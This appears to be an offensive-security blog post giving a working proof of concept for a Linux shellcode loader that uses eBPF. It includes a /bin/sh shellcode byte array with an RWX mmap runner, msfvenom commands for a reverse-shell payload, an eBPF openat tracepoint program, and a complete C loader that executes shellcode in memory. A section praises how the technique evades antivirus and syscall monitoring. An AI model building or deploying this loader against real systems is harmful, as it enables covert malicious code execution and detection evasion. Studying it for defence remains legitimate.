Introduction Link to heading

In recent years, the Extended Berkeley Packet Filter (eBPF) has emerged as a very powerful technology within the Linux kernel, allowing the efficient and secure execution of custom software directly in the kernel, without the need to modify its source code. Originally created for packet sniffing, eBPF has evolved into a highly versatile observability, security and automation platform.

In parallel, shellcode remains a classic and yet extremely relevant technique within the “arsenal”. Shellcodes are compressed snippets of machine language code that perform a specific action, often used to obtain remote shells, escalate privileges or exploit flaws.

In this paper, we explore the integration between eBPF and shellcode loaders, a field that has not been explored much. The idea is to use eBPF to monitor system events (such as the famous syscalls) and from there, execute shellcode directly in user-land memory. This approach provides a highly stealthy means of executing malicious code, taking advantage of the low overhead of eBPF and the difficulty of detecting dynamically injected shellcodes

The purpose of this paper is to demonstrate a functional proof of concept of how this can be done, explaining each part of the process!

1 - Objective Link to heading

The main objective of this paper is to demonstrate a practical approach for integrating kernel-land and user-land, through two central points:

Interception of syscalls with eBPF -> code an eBPF program attached to a kernel tracepoint to capture specific events, in this case, the openat() syscall. This allows real-time monitoring of system activity, without significant performance impact, and with isolation guaranteed by the eBPF sandbox
Loading and executing shellcode in memory in user-land: after activation via kernel event, the program in user-land is responsible for loading a shellcode previously compiled for the x64_86 architecture into an executable region of memory, using mmap() (we will talk more about it later in this same paper). The shellcode is then executed directly in memory, eliminating the need for temporary files or other detectable artifacts

2 - Fundamentals Link to heading

2.1 - eBPF Link to heading

eBPF (Extended Berkeley Packet Filter) is a Linux kernel technology that allows the safe execution of bytecode programs within the kernel itself, in an isolated and controlled manner. Originally designed for network packet filtering, eBPF has evolved into a generalized platform capable of monitoring and changing the behavior of the operating system in real time, without the need to modify or restart the kernel

eBPF programs are written in a restricted language (usually C compiled to BPF bytecode via LLVM/Clang) and loaded into the kernel using the bpf() interface or libs such as libbpf. Before execution, this bytecode goes through a rigorous verification process to ensure that it does not cause instability or compromise the kernel (for example, checking for infinite loops or invalid memory accesses)

eBPF programs can be attached to various points in the kernel, such as tracepoints, kprobes, uprobes, cgroups, sockets, etc., allowing the capture and manipulation of system events!

tracepoints (sys_enter_openat in this case) Link to heading

In the example of this paper, we use a tracepoint in the kernel called sys_enter_openat, which is triggered every time a process executes the openat() syscall. This tracepoint provides access to the syscall arguments (such as the path of the file being opened) at the time of invocation

Attaching an eBPF program to this tracepoint allows you to intercept this information efficiently and safely, enabling, for example, detailed monitoring of file activity in real time!

eBPF isolation Link to heading

The eBPF environment runs in a sandbox, without direct access to critical kernel structures, so this reduces the risk of failures and maintains system stability, while allowing tools to monitor and interact with the kernel safely and effectively

2.2 - Shellcode Link to heading

Shellcode is a piece of code that does something specific when executed, usually used in exploits to open a shell, execute commands or download payloads. Despite the name, not all shellcode opens a shell. It can only create files, connect to the network or execute any valid instruction

How the hell is it executed? Link to heading

Shellcode is usually injected and executed in memory, so the process is basically:

1 -> allocate memory with execution permission (for example: mmap() or malloc() + mprotect())
2 -> copy the shellcode to this memory
3 -> create a function that points to the shellcode and call it

Well, to exemplify, here is a very simple C code that invokes a sh shell through a shellcode:

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

unsigned char shellcode[] = {
  0x48, 0x31, 0xc0, 0x48, 0x89, 0xc2, 0x48, 0x89, 0xc6, 0x48, 0x8d, 0x3d, 0x04, 0x00, 0x00, 0x00, 0xb0, 0x3b, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
};

int main() {
    void *mem = mmap(NULL, 4096,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_ANON | MAP_PRIVATE, -1, 0);
    memcpy(mem, shellcode, sizeof(shellcode));
    ((void(*)())mem)();
}

Generation with msfvenom: Link to heading

A practical and quick way to generate shellcodes is with msfvenom, from metasploit, here I will leave some examples of how to generate shellcodes with msfvenom:

generate shellcode for a reverse shell in x86_64;

bash

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f c

this generates the shellcode in C format to be copied directly into the code, but you can also generate a “pure” shellcode in binary like this:

bash

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f raw -o pwnbuffer.bin

2.3 - Loader integration Link to heading

Now, we raise a question: why use mmap() with PROT_EXEC? In a straightforward way, we need a memory region that can execute code. mmap() with PROT_READ | PROT_WRITE | PROT_EXEC allows us to allocate space where we copy the shellcode and can execute it directly in RAM!

eBPF requires that its maps and programs be locked in memory (no swap), so the role of RLIMIT_MEMLOCK is to define how much memory the process can lock. If it is too low, bpf() fails with EPERM, so we increase this limit with:

struct rlimit r = {RLIM_INFINITY, RLIM_INFINITY};
setrlimit(RLIMIT_MEMLOCK, &r);

Without this, the loader won’t even load the eBPF.

3 - Implementation Link to heading

3.1 - eBPF Code (kernel-land) Link to heading

The following C code defines the eBPF program that will be loaded into the kernel and attached to the sys_enter_openat tracepoint. This tracepoint is triggered whenever a process executes the openat() syscall used internally by functions such as open() and fopen()

#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>
#include <linux/ptrace.h>
#include <linux/types.h>
#include <linux/stat.h>

struct trace_event {
    __u64           pad;
    int             dfd;
    const char     *filename;
    int             flags;      
    __u32           mode;
};

char LICENSE[] SEC("license") = "GPL";

SEC("tracepoint/syscalls/sys_enter_openat")
int trace_openat(struct trace_event *ctx)
{
    char first_byte = 0;
    bpf_probe_read_user(&first_byte,
                       sizeof(first_byte),
                       ctx->filename);

    bpf_printk("PWNED!! %c\n", first_byte);
    return 0;
}

“What does the code do?”

intercepts calls to openat()
reads the first character of the file name being opened
uses bpf_printk() to log to /sys/kernel/debug/tracing/trace_pipe

So, this allows you to monitor in real time what is being accessed by the system without invasive hooks!

3.2 - Code loader (user-land) Link to heading

The loader is the user-land program responsible for loading the eBPF into the kernel, and then, loading and executing a shellcode directly from memory! Here is the loader code in C:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <bpf/libbpf.h>

static void bump_memlock_rlimit(void)
{
    struct rlimit r = { RLIM_INFINITY, RLIM_INFINITY };
    if (setrlimit(RLIMIT_MEMLOCK, &r)) {
        perror("setrlimit(RLIMIT_MEMLOCK)");
        exit(1);
    }
}

static void *load_shellcode(const char *path)
{
    FILE *f = fopen(path, "rb");
    if (!f) {
        perror("fopen(shellcode)");
        exit(1);
    }
    fseek(f, 0, SEEK_END);
    size_t size = ftell(f);
    rewind(f);

    void *mem = mmap(NULL,
                     size,
                     PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_ANONYMOUS | MAP_PRIVATE,
                     -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        fclose(f);
        exit(1);
    }

    if (fread(mem, 1, size, f) != size) {
        perror("fread(shellcode)");
        munmap(mem, size);
        fclose(f);
        exit(1);
    }
    fclose(f);
    return mem;
}

int main(int argc, char **argv)
{
    struct bpf_object *obj;
    struct bpf_program *prog;
    struct bpf_link *link;
    int err;

    bump_memlock_rlimit();
    obj = bpf_object__open_file("ebpf_prog.o", NULL);
    if (!obj) {
        fprintf(stderr, "Error: Failed to open ebpf_prog.o\n");
        return 1;
    }
    err = bpf_object__load(obj);
    if (err) {
        fprintf(stderr, "Error: Failed to load eBPF object: %d\n", err);
        return 1;
    }

    bpf_object__for_each_program(prog, obj) {
        link = bpf_program__attach(prog);
        if (!link) {
            fprintf(stderr, "Error: Failed to attach eBPF program\n");
            return 1;
        }
    }

    printf("[+] eBPF loading and attached (tracepoint/syscalls:sys_enter_openat)\n");
    void (*shellcode_func)() = load_shellcode("shellcode.bin");
    printf("[+] Executing shellcode in memory...\n");
    shellcode_func();

    return 0;
}

But… what does the loader do?

removes memory lock limitations that could prevent eBPF from loading
loads the compiled file ebpf_prog.o with the bpf_object__open_file() function
attaches the eBPF to the sys_enter_openat tracepoint via bpf_program__attach()
loads the binary shellcode from a file with mmap() and PROT_EXEC permissions
and finally, executes the shellcode immediately from memory

Anyway, the result, if everything goes well, the terminal will display something like:

bash

[+] eBPF loading and attached (tracepoint/syscalls:sys_enter_openat)
[+] Executing shellcode in memory...
PWNED BY SLAYER%

Anyway, I will make my github with the repository available at the end of this paper, for more information, along with execution assistance and the like, take a look at its repo!

4 - Security Analysis Link to heading

Using eBPF as a tool for loading and executing shellcodes represents a very innovative approach in the offsec area. By pairing the kernel’s exec space with common techniques for injecting and executing arbitrary code, the pentester gains a sophisticated way to achieve his goals with discretion and efficiency. However, this approach comes with limitations that need to be understood before its practical application!

Advantages: Link to heading

1 - Direct memory execution: the shellcode is read directly from a binary file (shellcode.bin) and mapped to memory using the mmap() function with PROT_EXEC permissions. This means that the code never touches the disk in executable format, considerably reducing the chance of being detected by traditional antiviruses or by tools that monitor temporary executable files. Furthermore, the shellcode is executed through a direct call (function pointer), which avoids the use of common syscalls (such as execve) to start a new process, making it difficult to identify by tools that monitor syscalls.
2 - Smaller footprint: the user-land loader is extremely simple and small. It only loads the eBPF program and maps the shellcode into memory. This means that the binary can go unnoticed in heuristic scans, since its structure does not contain common malware functions, such as network communication, suspicious embedded strings or unusual API calls.
3 - Stealth via kernel-land: using eBPF as an entry point means that the kernel is cooperating in the execution, without the need for more obvious techniques such as LD_PRELOAD, ptrace injection, or modifications to user libs. Additionally, intercepting syscalls (such as openat) via tracepoint allows legitimate user actions (such as opening files in the terminal) to serve as natural triggers for shellcode activation.

Limitations: Link to heading

1 - Elevated permissions (root): to load eBPF programs and manipulate RLIMIT_MEMLOCK, you must be root or have capabilities such as CAP_SYS_ADMIN. This limits its use in real environments, where privilege escalation may have already occurred.
2 - Visibility in trace_pipe: even if the payload is discreet, using bpf_printk() sends messages to /sys/kernel/debug/tracing/trace_pipe. If an analyst is monitoring the trace_pipe, they can see the strings and identify the activity.
3 - System resource dependency: The loader depends on specific kernel headers and libbpf, which can cause compatibility issues or make detection easier in protected environments.

Conclusion! Link to heading

The combination of eBPF and shellcode loaders demonstrates how it is possible to take advantage of more advanced mechanisms of the Linux kernel to execute code in a discreet and controlled manner. With eBPF, we intercept system calls directly in the kernel, activating custom routines without modifying files on disk or relying on traditional hooks. By loading the shellcode into memory with mmap and execution permissions, we ensure that the execution occurs entirely in user-land, without leaving obvious traces in the system. This technique offers advantages such as a smaller footprint, direct execution from memory and activation based on REAL system events. Although it requires elevated permissions such as root, and can be monitored with appropriate tools, it exemplifies the potential of eBPF not only as an observability and security tool, but also as a mechanism for automation and control of execution flows

Source github Link to heading

ebpf_loader - github

Shellcode Loader with eBPF

Introduction Link to heading

1 - Objective Link to heading

2 - Fundamentals Link to heading

2.1 - eBPF Link to heading

tracepoints (sys_enter_openat in this case) Link to heading

eBPF isolation Link to heading

2.2 - Shellcode Link to heading

How the hell is it executed? Link to heading

Generation with msfvenom: Link to heading

2.3 - Loader integration Link to heading

3 - Implementation Link to heading

3.1 - eBPF Code (kernel-land) Link to heading

3.2 - Code loader (user-land) Link to heading

4 - Security Analysis Link to heading

Advantages: Link to heading

Limitations: Link to heading

Conclusion! Link to heading

Source github Link to heading

Sources used to build this article Link to heading